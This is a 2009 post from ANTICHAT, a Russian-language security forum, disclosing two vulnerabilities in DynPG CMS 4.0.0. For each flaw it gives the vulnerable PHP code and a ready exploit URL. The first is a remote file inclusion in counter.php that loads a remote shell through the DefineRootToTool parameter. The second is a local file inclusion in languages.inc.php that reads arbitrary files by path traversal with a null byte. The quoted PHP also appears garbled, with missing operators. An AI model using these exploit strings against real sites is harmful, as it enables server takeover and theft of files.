HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Энциклопедия уязвимых скриптов
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 14.12.2009, 20:11
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию
DynPG CMS 4.0.0
Web site : http://www.dynpg.org
Vesrion : 4.0.0

[Remote File Inclusion]

Vuln file: counter.php [str:15]
PHP код:
    $inc = empty($_GET["inc"]) ? $_GET["inc"];

    if ( !empty($inc) ) {
        # Aufruf des Counters ьber einen Link. $inc enthдlt dann die Datenbankkennung!

        $inc_or   htmlentities(urldecode($inc));
        $inc_head urldecode(str_replace('&''&'$inc));
        $inc      addslashes(strtolower($inc));

        if ( empty($GLOBALS["DefineRootToTool"]) ) {
            $GLOBALS["DefineRootToTool"] = "";
        }

        require_once $GLOBALS["DefineRootToTool"]."config.php"
Exploit:
if register_globals = ON && allow_url_include = ON
Код:
http://[host]/[path]/counter.php?inc=1&DefineRootToTool=[shell]?
[Local File Inclusion]

Vuln file: languages.inc.php [str:5]
PHP код:
   global $lang_dpg;

   require_once dirname(__FILE__) . '/plugins/languages.php';
   require_once dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php'
Exploit:
if register_globals = ON && magic_quotes = OFF
Код:
http://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[local_file]%00
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.